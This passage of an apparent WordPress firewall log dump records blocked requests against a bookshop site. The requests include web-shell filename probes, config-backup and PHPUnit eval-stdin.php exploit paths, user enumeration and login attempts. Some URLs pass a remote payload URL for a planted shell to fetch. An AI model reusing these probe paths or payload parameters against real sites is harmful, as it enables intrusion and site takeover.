Trident\\/6.0)\"}','3FHgtTo9U2wEbKJXYafRIs7i',0,1637052753.6986,433,'','POST',403,0,600,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/cloudxv3.php','','{\"1\":\"Python-urllib\\/2.7\"}','PfX6LipHoEbwWZ7389CMG2Ng',0,1637055026.4684,408,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/hello.php','','{\"1\":\"Python-urllib\\/2.7\"}','NWejRJEkYp1lfF0rLgxmawvZ',0,1637055027.7612,410,'','GET',403,0,700,0,1,'',0),('69.30.240.27',1159655451,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','2rt3DiAhogbqGOpM1v9zRkBV',0,1637058487.4132,520,'','POST',403,0,600,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F8iySNlOY3wZmxPpdBv0cEVo',0,1637058521.2328,544,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XOnd5q2uxDIkSPQ3Ag7seGK1',0,1637058526.5323,681,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QOTMf0JCtjYgx78L9vIcnEuG',0,1637058532.0098,526,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UDBzqSbEjP4sa7dTlIvmiXk0',0,1637058537.2359,512,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4KWoS0grPGB1MEwcL7XUbyOQ',0,1637058554.4117,2116,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l7Dp38tLZsdNhEY1PWXTrm9k',0,1637058561.1714,440,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3SoTVY1hZgUyt7XfAN9xwJkQ',0,1637058565.9761,400,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yjPrQo9KSDq3BkhUMc6iu7bw',0,1637058571.7170,392,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','F0WEudp3n8bRCQxYjMtrSqlk',0,1637058582.1482,422,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rnYauLv1O0BQJFbxH5Dw96fq',0,1637058587.6020,457,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','KAZkmWQtoIsXqa26pP589xy3',0,1637058593.8127,410,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Lz6ENqol58pvwUOHbWr2neRa',0,1637058599.1824,488,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','elzqXEicQ8sn9DhfvO32ZkPx',0,1637058604.0032,473,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yEzaAING3p0s5w4Qc6fiVSmZ',0,1637058609.1687,421,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fp9khKVDUyCSx5Bs7MclLe8j',0,1637058614.3483,553,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Pm9rguzp0q3LInlchKb7FewX',0,1637058620.1420,434,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4h7V8nATEK1jQgulXO0mFP5Z',0,1637058626.6721,199,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3SO95jGwAnWabzTcIPhkslg6',0,1637058632.2484,1390,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O8QL1IJuk2AR9pw56NjVHgDi',0,1637058639.4889,476,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vrQR2V9U3Tch8KYeift6GLXs',0,1637058645.6816,332,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZJY4tDL71eMcxyhCzQ8UBNXa',0,1637058650.9211,655,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9JoYA2xaWrZC1uPkL3Fv0GOi',0,1637058656.1144,369,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','apcus7hjM4C9D6e2EzWQiVt0',0,1637058660.7078,396,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ks5giqjpTBM41xZH3vuKV9t7',0,1637058665.7149,430,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7QO3a2GwulotW9hsFifJ4YZm',0,1637058670.4775,445,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GDToxruaXmy14NIR3BOEnvL8',0,1637058674.6654,406,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','16NmCOwaS2JcyMZbo9XT4AtU',0,1637058677.7213,428,'','POST',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DxzVyojSr5cKXbnWgQ6PGwNs',0,1637058682.4084,380,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','C9El30ZPGYTixmhDcRQHF1SM',0,1637058687.1025,1888,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cVDq230szIUnNuatK7FyWBCY',0,1637058693.0882,396,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','SdaIWFgsnu2PD3GkHUtrCL1A',0,1637058698.4096,374,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1j3yHFt2pmEgXJubrGfzKsNL',0,1637058704.1801,161,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RZEaQl1MyvJtCnDm8U0Tbp9I',0,1637058708.6308,647,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gN2px3PaWlUv0QY6df9MhVRT',0,1637058714.3321,354,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WoOmZ4redV5TwHDtcXGph7FJ',0,1637058718.9669,758,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2ft1emPGSyD5w06QFWolrLvE',0,1637058724.5116,1335,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kHzsNby6JSvPen84rZclGauA',0,1637058729.8362,750,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UgVC6XGnl47YzbqPQ3Rvjsim',0,1637058734.4109,391,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Uac7HIRr6iLuewGhK3C0AYMS',0,1637058739.3217,2459,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WmfeVguYJL1jSUk2hAIFTCdx',0,1637058746.1386,425,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5x0Ap8cMeW2QXHnlNdvfG9Kh',0,1637058751.1773,402,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OyiSHv7VEwkAUu6xZQmhjrbM',0,1637058757.2717,458,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','o7tfGAgLQ8WFCvY063UIV5wS',0,1637058763.2047,434,'','GET',403,0,700,0,1,'',0),('204.12.198.246',3423389430,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','UWDLdv2GebxpEioqkKcJ6Iy9',0,1637063460.9742,179,'','POST',403,0,600,0,1,'',0),('49.12.225.174',822927790,'','https://ashbooks.co.uk/wordpress/wp-admin/setup-config.php?step=1','','{\"1\":\"Apache\\/2.4.34 (Ubuntu) OpenSSL\\/1.1.1 (internal dummy connection)\"}','Awo4rgKHmd3nvCjyYcLRhDbN',0,1637063558.6626,484,'','GET',403,0,700,0,1,'',0),('69.30.231.158',1159653278,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8oBhZTiKWLSyEsgDkmdO9nvQ',0,1637064141.1045,429,'','POST',403,0,600,0,1,'',0),('3.133.103.128',59074432,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\"}','v2DjJkUdFwe0iyaAtNPRxb3m',0,1637064777.4674,409,'','GET',403,0,520,0,1,'',0),('204.12.198.246',3423389430,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','mzYc1SAr3L0Els5wi8yVOCx2',0,1637069282.3327,435,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','3Wg9SJOy2hmvfcEk1PlDUdow',0,1637070070.4391,165,'','POST',403,0,600,0,1,'',0),('91.185.199.254',1538902014,'','https://ashbooks.co.uk/wp-content/plugins/wp-striplple/striplple.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','v27egZaxwCA0DtqPkFY5SrzR',0,1637072300.2159,448,'','GET',403,0,700,0,1,'',0),('91.185.199.254',1538902014,'','https://ashbooks.co.uk/wp-stream.php','','{\"1\":\"Mozilla\\/5.1 (Windows NT 6.0; WOW64) AppleWebKit\\/533.36 (KHTML, like Gecko) Chrome\\/46.0.2754.75 Safari\\/533.36\",\"2\":\"ashbooks.co.uk\"}','Irjiw6uYDb1GU5Op87qWTdAS',0,1637072416.3802,1457,'','GET',403,0,700,0,1,'',0),('23.23.6.16',387384848,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','SsAX2rJovUTmOLYRPfB0uGq6',0,1637073024.1663,3561,'','GET',403,0,520,0,1,'',0),('69.30.231.158',1159653278,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','uP1OwmEoIDqRxj2e5VKH4TaX',0,1637074863.5517,181,'','POST',403,0,600,0,1,'',0),('192.187.127.21',3233513237,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','YNmjpky0ahsuK5MDOoCIPneG',0,1637075957.4831,175,'','POST',403,0,600,0,1,'',0),('23.23.6.16',387384848,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','a0D9eYx4Fh7JoMS1diLG5Bzk',0,1637076078.2838,1491,'','GET',403,0,520,0,1,'',0),('104.154.111.139',1754951563,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','DBztPd8WFQ2mu5Jj6MR4CIvT',0,1637076211.5320,416,'','GET',403,0,520,0,1,'',0),('104.154.111.139',1754951563,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','1Sp6UbJoOmzt58jHwqWF4CDV',0,1637076211.5624,418,'','GET',403,0,520,0,1,'',0),('69.30.231.158',1159653278,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','Pu5aG0OFZ8B7vmL2y3cMHpkE',0,1637080975.8076,370,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','h9aDiIojKBUAZwM6Fgsc8O1X',0,1637082064.8345,154,'','POST',403,0,600,0,1,'',0),('192.187.118.205',3233511117,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','PCLIt9WxklbGKEJA3USoa1Qy',0,1637088171.6249,163,'','POST',403,0,600,0,1,'',0),('23.23.6.16',387384848,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','x3MG09mBN6R2fZAprUOsHYW8',0,1637089955.0300,2111,'','GET',403,0,520,0,1,'',0),('37.233.17.225',636031457,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36 Edg\\/90.0.818.49\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','QbsT9HnqFSXGtyL7pgRhKuJB',0,1637092823.8030,188,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uFWdmpwJU4X1ocL7Kl092Zhy',0,1637092824.2036,391,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sC7qLk8IGW69HVnxaAc4jFK0',0,1637092826.8824,162,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','X5dUleYx1tfjnMzcCDJBP3Wu',0,1637092829.2304,387,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ES9tMIP6HkozKgBhZ5y7QWjJ',0,1637092831.5256,760,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','s0MevD2KRrSOgCxLVoXGn5kj',0,1637092846.9252,387,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AtvwCb2QZENjBug45MnTWo9H',0,1637092849.4602,400,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kvnf2IcEXFtbPQlq4uNyBgAp',0,1637092851.9940,381,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zUQ9Y3JOcVgy7SAvhoxsl08W',0,1637092854.9791,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 